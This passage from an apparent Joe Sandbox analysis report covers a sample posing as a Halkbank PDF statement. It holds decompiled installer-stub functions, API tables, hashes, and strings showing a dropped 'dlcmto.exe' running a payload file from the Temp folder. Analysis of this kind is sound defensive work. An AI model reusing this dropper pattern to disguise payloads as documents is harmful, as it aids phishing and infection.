						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                          0x00404ab5
                                          0x00404abb
                                          0x00404ac1
                                          0x00404ace
                                          0x00404adc
                                          0x00404adf
                                          0x00404ae7
                                          0x00404aed
                                          0x00404aed
                                          0x00404af9
                                          0x00404afc
                                          0x00404b6a
                                          0x00404b71
                                          0x00404c48
                                          0x00404c4f
                                          0x00404c5e
                                          0x00404c5e
                                          0x00404c62
                                          0x00404c6c
                                          0x00404c79
                                          0x00404c7b
                                          0x00404c7b
                                          0x00404c89
                                          0x00404c90
                                          0x00404c97
                                          0x00404c9a
                                          0x00404cd6
                                          0x00404cd8
                                          0x00404cde
                                          0x00404ce3
                                          0x00404ce7
                                          0x00404ce9
                                          0x00404ce9
                                          0x00404d05
                                          0x00000000
                                          0x00404d07
                                          0x00404d0a
                                          0x00404d18
                                          0x00404d1e
                                          0x00404d1f
                                          0x00404d22
                                          0x00404d25
                                          0x00000000
                                          0x00404d25
                                          0x00404c9c
                                          0x00404c9e
                                          0x00404ca2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404ca4
                                          0x00404ca4
                                          0x00404cb1
                                          0x00404cb6
                                          0x00000000
                                          0x00000000
                                          0x00404cba
                                          0x00404cbc
                                          0x00404cbc
                                          0x00404cc5
                                          0x00404cc7
                                          0x00404ccc
                                          0x00404ccf
                                          0x00404cd4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404cd4
                                          0x00404d31
                                          0x00404d3b
                                          0x00404d3e
                                          0x00404d41
                                          0x00404d48
                                          0x00404d48
                                          0x00404d4a
                                          0x00404d4a
                                          0x00404d4f
                                          0x00404d51
                                          0x00404d59
                                          0x00404d60
                                          0x00404d62
                                          0x00404d6d
                                          0x00404d6d
                                          0x00404d62
                                          0x00404d7d
                                          0x00404d87
                                          0x00404d8f
                                          0x00404daa
                                          0x00404d91
                                          0x00404d9a
                                          0x00404d9a
                                          0x00404d8f
                                          0x00404daf
                                          0x00404db4
                                          0x00404db9
                                          0x00404dc2
                                          0x00404dc2
                                          0x00404dcb
                                          0x00404dcd
                                          0x00404dcd
                                          0x00404dd9
                                          0x00404de1
                                          0x00404deb
                                          0x00404deb
                                          0x00404df0
                                          0x00000000
                                          0x00404df0
                                          0x00404c9a
                                          0x00404c51
                                          0x00404c58
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404c58
                                          0x00404b77
                                          0x00404b80
                                          0x00404b9a
                                          0x00404b9f
                                          0x00404ba9
                                          0x00404bb0
                                          0x00404bbc
                                          0x00404bbf
                                          0x00404bc2
                                          0x00404bc9
                                          0x00404bd1
                                          0x00404bd4
                                          0x00404bd8
                                          0x00404bdf
                                          0x00404be7
                                          0x00404c41
                                          0x00404be9
                                          0x00404bea
                                          0x00404bf1
                                          0x00404bfb
                                          0x00404c03
                                          0x00404c10
                                          0x00404c24
                                          0x00404c28
                                          0x00404c28
                                          0x00404c24
                                          0x00404c2d
                                          0x00404c3a
                                          0x00404c3a
                                          0x00404be7
                                          0x00000000
                                          0x00404b9f
                                          0x00404b8d
                                          0x00000000
                                          0x00000000
                                          0x00404b93
                                          0x00000000
                                          0x00404afe
                                          0x00404b0b
                                          0x00404b14
                                          0x00404b21
                                          0x00404b21
                                          0x00404b28
                                          0x00404b2e
                                          0x00404b37
                                          0x00404b3a
                                          0x00404b3d
                                          0x00404b45
                                          0x00404b48
                                          0x00404b4b
                                          0x00404b51
                                          0x00404b58
                                          0x00404b5f
                                          0x00404df6
                                          0x00404e08
                                          0x00404b65
                                          0x00404b68
                                          0x00000000
                                          0x00404b68
                                          0x00404b5f

                                          APIs
                                          • GetDlgItem.USER32 ref: 00404B04
                                          • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                          • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00423748,00000000,?,?), ref: 00404C1C
                                          • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf), ref: 00404C28
                                          • SetDlgItemTextW.USER32 ref: 00404C3A
                                            • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                            • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                            • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                            • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                            • Part of subcall function 004068EF: CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                          • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                            • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                            • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                            • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf$A$C:\Users\user\AppData\Local\Temp$H7B
                                          • API String ID: 2624150263-3196994807
                                          • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                          • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                          • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                          • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                          0x004021b3
                                          0x004021bd
                                          0x004021c7
                                          0x004021d1
                                          0x004021dc
                                          0x004021df
                                          0x004021f9
                                          0x004021fc
                                          0x00402202
                                          0x00402205
                                          0x0040220f
                                          0x00402213
                                          0x00402213
                                          0x00402218
                                          0x00402229
                                          0x00402231
                                          0x004022e8
                                          0x004022e8
                                          0x004022ef
                                          0x00402237
                                          0x00402237
                                          0x00402246
                                          0x0040224a
                                          0x0040224d
                                          0x00402253
                                          0x00402261
                                          0x00402264
                                          0x00402266
                                          0x00402271
                                          0x00402271
                                          0x00402276
                                          0x00402278
                                          0x0040227f
                                          0x0040227f
                                          0x00402282
                                          0x0040228b
                                          0x0040228e
                                          0x00402294
                                          0x00402296
                                          0x004022a0
                                          0x004022a0
                                          0x004022a3
                                          0x004022ac
                                          0x004022af
                                          0x004022b8
                                          0x004022be
                                          0x004022c0
                                          0x004022ce
                                          0x004022ce
                                          0x004022d1
                                          0x004022d7
                                          0x004022d7
                                          0x004022da
                                          0x004022e0
                                          0x004022e6
                                          0x004022fb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004022e6
                                          0x004022f1
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 542301482-501415292
                                          • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                          • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                          • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                          • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                          0x00402923
                                          0x0040293e
                                          0x00402949
                                          0x0040294a
                                          0x00402a94
                                          0x00402925
                                          0x00402928
                                          0x0040292b
                                          0x0040292e
                                          0x0040292e
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                          • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                          • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                          • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                          0x00405038
                                          0x00405051
                                          0x00405056
                                          0x0040505e
                                          0x00405064
                                          0x0040507a
                                          0x0040507d
                                          0x004052a8
                                          0x004052af
                                          0x004052c3
                                          0x004052b1
                                          0x004052b3
                                          0x004052b6
                                          0x004052b7
                                          0x004052be
                                          0x004052be
                                          0x004052cf
                                          0x004052dd
                                          0x004052e0
                                          0x004052f6
                                          0x0040536b
                                          0x0040536e
                                          0x00405370
                                          0x0040537a
                                          0x00405388
                                          0x00405388
                                          0x0040538a
                                          0x00405394
                                          0x0040539a
                                          0x0040539d
                                          0x004053a0
                                          0x004053bb
                                          0x004053a2
                                          0x004053ac
                                          0x004053ac
                                          0x004053a0
                                          0x00405394
                                          0x00000000
                                          0x0040536e
                                          0x004052fb
                                          0x00405306
                                          0x0040530b
                                          0x00405312
                                          0x00405317
                                          0x0040531b
                                          0x00405326
                                          0x00405326
                                          0x0040532a
                                          0x0040532e
                                          0x00405332
                                          0x00405345
                                          0x00405334
                                          0x00405334
                                          0x0040533b
                                          0x00405341
                                          0x0040533d
                                          0x0040533d
                                          0x0040533d
                                          0x0040533b
                                          0x00405349
                                          0x0040534b
                                          0x0040535e
                                          0x00405361
                                          0x00405364
                                          0x00405364
                                          0x0040532e
                                          0x00000000
                                          0x0040531b
                                          0x004052fd
                                          0x00405304
                                          0x00000000
                                          0x00000000
                                          0x00000000
